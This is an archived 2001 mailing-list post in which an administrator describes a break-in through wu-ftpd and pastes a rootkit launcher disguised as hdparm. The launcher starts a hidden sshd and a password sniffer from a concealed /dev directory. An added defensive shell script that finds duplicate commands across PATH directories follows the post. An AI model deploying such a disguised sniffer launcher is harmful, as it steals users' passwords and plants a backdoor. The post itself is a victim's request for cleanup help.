cannot rm hacker's file
From: Roy Wilson
Subject: cannot rm hacker's file
Date: Tue, 25 Dec 2001 22:10:33 +0000 (/etc/localtime)

Hello -
I was the victim of a cracker who exploited wu-ftp 2.6.0.
I've since upgraded to 2.6.2, and disabled or removed almost
all of the hidden programs he left behind, but I accidentally
found another one. The problem is I cannot rm it.
I use Linux 2.2.16 and bash.
I wanted to update my hdparm file from 3.9 to 4.6 so I did
a 'locate hdparm' and found I had a copy in both /usr/bin
and /usr/sbin. Curious, I did 'which hdparm' and found it
was the one in /usr/sbin. So what was the other one?
It turned out to be a perl script to call the hacker's
sniffer. I tried to move it. I tried to edit it with vi.
The permissions were 500, so I tried to chmod 700. I tried
to rm it. Nothing. I get this message:
"Cannot unlink hdparm: Operation not permitted."
Can you tell me how to get rid of this offensive piece of
garbage? BTW, this is the contents of the file:
#!/bin/sh
cd /dev/ida/.inet
./sshdu -f ./s
./linsniffer >> ./tcp.log &
cd /
I found that tcp.log contained plain text passwords of every user
on my system. Scary!
-Roy Wilson-
address@hidden
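
The duplicate `hdparm` in the message above was noticed by comparing `locate` and `which` output; the following added example (not part of the original post) makes the same comparison for every command name in a PATH-style directory list and shows whether each copy is a script or a binary. The function names and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example: report command names present in more than one directory
# of a PATH-style list. All names and sample files here are constructed.

# classify FILE: print "script" if FILE starts with "#!", otherwise "binary".
classify() {
    if [ "$(head -c 2 "$1" 2>/dev/null | tr -d '\000')" = "#!" ]; then
        echo script
    else
        echo binary
    fi
}

# find_duplicates "dir1:dir2:...": one line per name found in 2+ directories,
# directories listed in search order (the first one is what the shell runs).
find_duplicates() {
    old_ifs=$IFS; IFS=:
    set -- $1
    IFS=$old_ifs
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        for f in "$dir"/*; do
            [ -f "$f" ] && [ -x "$f" ] || continue
            printf '%s\t%s\t%s\n' "${f##*/}" "$dir" "$(classify "$f")"
        done
    done | awk -F'\t' '
        { if (++n[$1] == 1) order[++k] = $1
          where[$1] = where[$1] " " $2 "(" $3 ")" }
        END { for (i = 1; i <= k; i++)
                  if (n[order[i]] > 1) print order[i] ":" where[order[i]] }'
}

# Constructed sample: two directories that both hold "hdparm", one a
# stand-in binary and one a shell script, mirroring the situation described.
make_sample() {
    d=$(mktemp -d) || return 1
    mkdir "$d/sbin" "$d/bin"
    printf '\177ELF-stand-in' > "$d/sbin/hdparm"
    printf '#!/bin/sh\necho placeholder\n' > "$d/bin/hdparm"
    printf '#!/bin/sh\necho placeholder\n' > "$d/bin/unique"
    chmod 755 "$d/sbin/hdparm" "$d/bin/hdparm" "$d/bin/unique"
    echo "$d"
}

s=$(make_sample)
find_duplicates "$s/sbin:$s/bin"
rm -rf "$s"
```

To check a live system, call `find_duplicates "$PATH"`. On systems where `/bin` is a symlink to `/usr/bin`, every name shows up twice, so leave one of the pair out of the list.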